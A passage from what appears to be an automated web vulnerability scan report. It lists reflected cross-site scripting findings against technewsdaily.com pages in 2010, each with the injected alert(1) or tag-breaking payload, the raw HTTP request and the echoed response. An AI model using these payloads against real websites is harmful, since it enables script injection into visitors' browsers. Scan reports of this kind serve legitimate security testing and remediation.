'c4:"http://www.technewsdaily.com/job-seekers-most-overused-buzzwords-revealed-1808/?2168d'-alert(1)-'3dfee23b27=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.102. http://www.technewsdaily.com/job-seekers-most-overused-buzzwords-revealed-1808/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /job-seekers-most-overused-buzzwords-revealed-1808/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49567"><a>81c479c6611 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /job-seekers-most-overused-buzzwords-revealed-1808/?49567"><a>81c479c6611=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63623

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/job-seekers-most-overused-buzzwords-revealed-1808/?49567"><a>81c479c6611=1/" />
...[SNIP]...

1.103. http://www.technewsdaily.com/lasers-could-defend-helicopters-against-missiles--1172/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /lasers-could-defend-helicopters-against-missiles--1172/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96e12'-alert(1)-'f0d7d5560f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lasers-could-defend-helicopters-against-missiles--117296e12'-alert(1)-'f0d7d5560f1/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40506

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/lasers-could-defend-helicopters-against-missiles--117296e12'-alert(1)-'f0d7d5560f1/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.104. http://www.technewsdaily.com/lasers-could-defend-helicopters-against-missiles--1172/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /lasers-could-defend-helicopters-against-missiles--1172/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ba2f'-alert(1)-'7cf0f87ab98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lasers-could-defend-helicopters-against-missiles--1172/?6ba2f'-alert(1)-'7cf0f87ab98=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64146

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
xt/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/lasers-could-defend-helicopters-against-missiles--1172/?6ba2f'-alert(1)-'7cf0f87ab98=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.105. http://www.technewsdaily.com/lasers-could-defend-helicopters-against-missiles--1172/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /lasers-could-defend-helicopters-against-missiles--1172/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ded2"><a>15af9eca811 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /lasers-could-defend-helicopters-against-missiles--1172/?6ded2"><a>15af9eca811=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:55:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:55:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64508

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/lasers-could-defend-helicopters-against-missiles--1172/?6ded2"><a>15af9eca811=1/" />
...[SNIP]...

1.106. http://www.technewsdaily.com/latest-apple-ilife-makes-killer-movie-trailers-fixes-bad-garage-bands-1477/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /latest-apple-ilife-makes-killer-movie-trailers-fixes-bad-garage-bands-1477/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2c8a'-alert(1)-'6918a49ee69 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /latest-apple-ilife-makes-killer-movie-trailers-fixes-bad-garage-bands-1477a2c8a'-alert(1)-'6918a49ee69/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40546

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/latest-apple-ilife-makes-killer-movie-trailers-fixes-bad-garage-bands-1477a2c8a'-alert(1)-'6918a49ee69/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.107. http://www.technewsdaily.com/latest-apple-ilife-makes-killer-movie-trailers-fixes-bad-garage-bands-1477/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /latest-apple-ilife-makes-killer-movie-trailers-fixes-bad-garage-bands-1477/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae776'-alert(1)-'851478bcf65 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /latest-apple-ilife-makes-killer-movie-trailers-fixes-bad-garage-bands-1477/?ae776'-alert(1)-'851478bcf65=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65834

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/latest-apple-ilife-makes-killer-movie-trailers-fixes-bad-garage-bands-1477/?ae776'-alert(1)-'851478bcf65=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.108. http://www.technewsdaily.com/latest-apple-ilife-makes-killer-movie-trailers-fixes-bad-garage-bands-1477/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /latest-apple-ilife-makes-killer-movie-trailers-fixes-bad-garage-bands-1477/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e49b"><a>2e0ba5ecb34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /latest-apple-ilife-makes-killer-movie-trailers-fixes-bad-garage-bands-1477/?9e49b"><a>2e0ba5ecb34=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 66196

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/latest-apple-ilife-makes-killer-movie-trailers-fixes-bad-garage-bands-1477/?9e49b"><a>2e0ba5ecb34=1/" />
...[SNIP]...

1.109. http://www.technewsdaily.com/led-lights-illuminate-medical-field-1456/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /led-lights-illuminate-medical-field-1456/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af259'-alert(1)-'c11899a277c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /led-lights-illuminate-medical-field-1456af259'-alert(1)-'c11899a277c/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:55:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:55:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40478

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/led-lights-illuminate-medical-field-1456af259'-alert(1)-'c11899a277c/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.110. http://www.technewsdaily.com/led-lights-illuminate-medical-field-1456/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /led-lights-illuminate-medical-field-1456/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d18f8"><a>fa959b89ea4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /led-lights-illuminate-medical-field-1456/?d18f8"><a>fa959b89ea4=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63826

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/led-lights-illuminate-medical-field-1456/?d18f8"><a>fa959b89ea4=1/" />
...[SNIP]...

1.111. http://www.technewsdaily.com/led-lights-illuminate-medical-field-1456/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /led-lights-illuminate-medical-field-1456/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13df7'-alert(1)-'9a13574e422 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /led-lights-illuminate-medical-field-1456/?13df7'-alert(1)-'9a13574e422=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63464

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
cript type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/led-lights-illuminate-medical-field-1456/?13df7'-alert(1)-'9a13574e422=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.112. http://www.technewsdaily.com/mac-app-store-launch-date-announced-1749/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /mac-app-store-launch-date-announced-1749/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6007'-alert(1)-'c8fabfde0e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-app-store-launch-date-announced-1749c6007'-alert(1)-'c8fabfde0e1/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40478

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/mac-app-store-launch-date-announced-1749c6007'-alert(1)-'c8fabfde0e1/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.113. http://www.technewsdaily.com/mac-app-store-launch-date-announced-1749/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /mac-app-store-launch-date-announced-1749/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8b9a"><a>1ad26e2a2af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-app-store-launch-date-announced-1749/?b8b9a"><a>1ad26e2a2af=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63677

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/mac-app-store-launch-date-announced-1749/?b8b9a"><a>1ad26e2a2af=1/" />
...[SNIP]...

1.114. http://www.technewsdaily.com/mac-app-store-launch-date-announced-1749/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /mac-app-store-launch-date-announced-1749/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee6a7'-alert(1)-'5f6a6f34f2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

